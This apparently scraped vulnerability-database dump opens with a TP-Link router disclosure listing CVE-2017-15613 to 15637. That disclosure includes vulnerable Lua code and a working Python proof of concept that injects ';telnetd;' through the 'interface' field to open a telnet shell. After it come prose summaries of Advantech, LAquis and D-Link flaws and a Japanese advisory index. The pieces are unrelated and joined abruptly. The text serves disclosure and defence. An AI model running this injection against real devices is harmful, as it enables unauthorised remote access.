WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L CVE details: ================ The detail of each vulnerability are as follows: CVE-2017-15613: new-interface variable in the cmxddns.lua file CVE-2017-15614: new-outif variable in the pptp_client.lua file CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file CVE-2017-15616: new-interface variable in the phddns.lua file CVE-2017-15617: iface variable in the interface_wan.lua file CVE-2017-15618: new-enable variable in the pptp_client.lua file CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file CVE-2017-15620: new-zone variable in the ipmac_import.lua file CVE-2017-15621: olmode variable in the interface_wan.lua file CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file CVE-2017-15623: new-enable variable in the pptp_server.lua file CVE-2017-15624: new-authtype variable in the pptp_server.lua file CVE-2017-15625: new-olmode variable in the pptp_client.lua file CVE-2017-15626: new-bindif variable in the pptp_server.lua file CVE-2017-15627: new-pns variable in the pptp_client.lua file CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file CVE-2017-15631: new-workmode variable in the pptp_client.lua file CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file CVE-2017-15633: new-ipgroup variable in the session_limits.lua file CVE-2017-15634: name variable in the wportal.lua file CVE-2017-15635: max_conn variable in the session_limits.lua file CVE-2017-15636: new-time variable in the webfilter.lua file CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file Credits: ================ chunibalon, puzzor @VARAS of IIE Timeline: ================ 2017.08 to 2017.09: Issues found. 2017.09.26: Vendor contacted. 2017.10.13: Vendor confirmed. 2017.10.14: CVE id requested. 2017.10.19: CVE id assigned. 2018.1: Vendor confirmed that all effected products have been fixed. Vulnerability detail: ================ These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file. In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113: ********************************* function add_phddns(http_form) local form_data = json.decode(http_form.data) local jdata = form_data.params.new ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil) if not ret then return false, err.ERR_COM_TABLE_ITEM_UCI_ADD end if not uci_r:commit(CONFIG_NAME) then return false, err.ERR_COM_UCI_COMMIT end -- add the ref of interface ifs.update_if_reference(jdata.interface, 1) sys.fork_exec('/etc/init.d/phddns restart') userconfig.cfg_modify() return jdata end ******************************* This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. Then the malformed value of "interface" argument causes the command injection vulnerability. PoC file: ================ ********************************* import requests import urllib import json # This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. # To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin' PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406' BASEURL = 'http://192.168.123.1' LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login' MARK = '###' VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK) headers = { "Accept": "application/json, text/javascript, /; q=0.01", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": BASEURL[7:], "Origin": BASEURL, "Referer": "%s/webpages/login.html" % (BASEURL), "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "X-Requested-With": "XMLHttpRequest" } login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}} login_data = {'data':json.dumps(login_data_value)} s = requests.Session() s.headers.update(headers) print (LOGINURL) print (login_data) res = s.post(LOGINURL, data=login_data) stok = eval(res.text)['result']['stok'] print '[] stok is %s' % (stok) tmp_vul = VULURL.replace(MARK, stok) print '[] vul_url is %s ' % (tmp_vul) delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}} delete_data = {'data': json.dumps(delete_data)} print '[+] delete existed rule' res = s.post(tmp_vul, data=delete_data) print '[] response is: %s' % (res.text) # after executing this payload, the router will open its telnetd service. payload = ''';telnetd;''' vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}} vul_data = {'data': json.dumps(vul_data)} print '[+] sending payload' res = s.post(tmp_vul, data=vul_data) print '[] response is: %s' % (res.text) *********************************** Reference: ================ https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
var-201801-0152	An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27ec IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
var-201801-0151	A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwscrp utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
var-201902-0647	LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the MemoryWriteLong method. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the aq process. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteNumber method. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition
var-201906-1029	In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
var-202007-0395	Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView Has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put in a state. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Advantech iView is a device management application provided by Advantech
var-202305-0214	D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202305-0130	D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202308-4331	D-Link DAP-2622 DDP Firmware Upgrade Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20077. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3186	D-Link DAP-2622 DDP Configuration Backup Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20066. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3151	D-Link DAP-2622 DDP User Verification Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20053. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3130	D-Link DAP-2622 DDP Configuration Restore Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20069. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3129	D-Link DAP-2622 DDP Set AG Profile Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20079. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3114	D-Link DAP-2622 DDP Reset Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20057. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3113	D-Link DAP-2622 DDP Configuration Backup Server Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20067. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3105	D-Link DAP-2622 DDP Reset Factory Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20058. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3456	D-Link DAP-2622 DDP Reboot Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20055. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3426	D-Link DAP-2622 DDP Configuration Backup Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20065. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3391	D-Link DAP-2622 DDP User Verification Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20052. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3319	D-Link DAP-2622 DDP Set SSID List Missing Authentication Vulnerability. This vulnerability allows network-adjacent attackers to make unauthorized changes to device configuration on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to manipulate wireless authentication settings. Was ZDI-CAN-20104. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company. No detailed vulnerability details are currently provided
var-202308-3121	D-Link DAP-2622 DDP Reboot Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20054. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3323	D-Link DAP-2622 DDP Change ID Password Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20060. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3219	D-Link DAP-2622 DDP Change ID Password New Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20063. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3185	D-Link DAP-2622 DDP Configuration Backup Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20068. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3150	D-Link DAP-2622 DDP Change ID Password New Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20062. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3131	D-Link DAP-2622 DDP Reset Factory Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20059. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3120	D-Link DAP-2622 DDP Configuration Backup Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20064. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3106	D-Link DAP-2622 DDP Reset Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20056. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Publish Date	Update Date
jvndb-2025-000012	Multiple vulnerabilities in The LuxCal Web Calendar	2025-02-17T13:43+09:00	2025-02-17T13:43+09:00
jvndb-2025-000013	acmailer CGI and acmailer DB vulnerable to OS command injection	2025-02-14T16:39+09:00	2025-02-14T16:39+09:00
jvndb-2025-000002	Multiple vulnerabilities in NEC Aterm series (NV25-003)	2025-02-14T15:48+09:00	2025-02-14T15:48+09:00
jvndb-2023-002797	Multiple vulnerabilities in ELECOM and LOGITEC network devices	2023-08-15T11:54+09:00	2025-02-13T15:21+09:00
jvndb-2024-001061	ELECOM wireless LAN routers vulnerable to OS command injection	2024-01-24T17:16+09:00	2025-02-13T14:31+09:00
jvndb-2025-000011	Multiple vulnerabilities in FileMegane	2025-02-13T13:39+09:00	2025-02-13T13:39+09:00
jvndb-2025-000010	acmailer vulnerable to cross-site scripting	2025-02-12T15:05+09:00	2025-02-12T15:05+09:00
jvndb-2024-000078	Multiple vulnerabilities in ELECOM wireless LAN routers	2024-07-30T15:34+09:00	2025-02-12T14:34+09:00
jvndb-2025-001017	Multiple vulnerabilities in STEALTHONE D220/D340/D440	2025-02-06T18:27+09:00	2025-02-06T18:27+09:00
jvndb-2025-001018	Improper restriction of XML external entity reference (XXE) vulnerability in OMRON NB-Designer	2025-02-06T18:26+09:00	2025-02-06T18:26+09:00
jvndb-2025-000008	Multiple vulnerabilities in Defense Platform Home Edition	2025-02-05T14:06+09:00	2025-02-05T14:06+09:00
jvndb-2025-000009	WordPress Plugin "Activity Log WinterLock" vulnerable to cross-site request forgery	2025-02-04T13:58+09:00	2025-02-04T13:58+09:00
jvndb-2025-001244	Clickjacking Vulnerability in JP1/ServerConductor/Deployment Manager	2025-01-30T18:19+09:00	2025-01-30T18:19+09:00
jvndb-2025-000007	SXF Common Library vulnerable to improper input data handling	2025-01-29T14:57+09:00	2025-01-29T14:57+09:00
jvndb-2025-000006	WordPress Plugin "Simple Image Sizes" vulnerable to cross-site scripting	2025-01-28T13:44+09:00	2025-01-28T13:44+09:00
jvndb-2025-000005	EXIF Viewer Classic vulnerable to cross-site scripting	2025-01-27T14:25+09:00	2025-01-27T14:25+09:00
jvndb-2025-000003	FortiWeb vulnerable to SQL injection	2025-01-21T15:59+09:00	2025-01-21T15:59+09:00
jvndb-2025-001027	Linux Ratfor vulnerable to stack-based buffer overflow	2025-01-16T13:27+09:00	2025-01-16T13:27+09:00
jvndb-2025-000001	PLANEX COMMUNICATIONS MZK-DP300N vulnerable to cross-site scripting	2025-01-08T17:08+09:00	2025-01-08T17:08+09:00
jvndb-2024-015471	Trend Micro Deep Security 20.0 Agent (for Windows) vulnerable to uncontrolled search path element	2024-12-25T11:28+09:00	2024-12-25T11:28+09:00
jvndb-2024-015393	Multiple security updates for Trend Micro Apex One and Apex One as a Service (December 2024)	2024-12-23T12:52+09:00	2024-12-23T12:52+09:00
jvndb-2024-000125	Multiple vulnerabilities in I-O DATA routers UD-LT1 and UD-LT1/EX	2024-12-04T15:22+09:00	2024-12-18T15:20+09:00
jvndb-2024-014918	Authentication Bypass Vulnerability in Hitachi Infrastructure Analytics Advisor and Hitachi Ops Center Analyzer	2024-12-17T15:23+09:00	2024-12-17T15:23+09:00
jvndb-2024-000128	Multiple vulnerabilities in SHARP routers	2024-12-17T07:54+09:00	2024-12-17T07:54+09:00
jvndb-2024-000127	"Shonen Jump+" App for Android fails to restrict custom URL schemes properly	2024-12-16T15:07+09:00	2024-12-16T15:07+09:00
jvndb-2024-014825	WordPress Plugin "My WP Customize Admin/Frontend" vulnerable to cross-site scripting	2024-12-16T13:57+09:00	2024-12-16T13:57+09:00
jvndb-2024-014793	Multiple vulnerabilities in FXC AE1021 and AE1021PE	2024-12-16T11:51+09:00	2024-12-16T11:51+09:00
jvndb-2024-014079	Trend Micro Deep Security Agent for Windows and Deep Security Notifier on DSVA vulnerable to OS command injection	2024-12-06T12:11+09:00	2024-12-06T12:11+09:00
jvndb-2023-000085	"Skylark" App fails to restrict custom URL schemes properly	2023-08-24T13:34+09:00	2024-12-03T15:51+09:00
jvndb-2024-000124	Multiple vulnerabilities in UNIVERGE IX/IX-R/IX-V series routers	2024-12-02T16:38+09:00	2024-12-02T16:38+09:00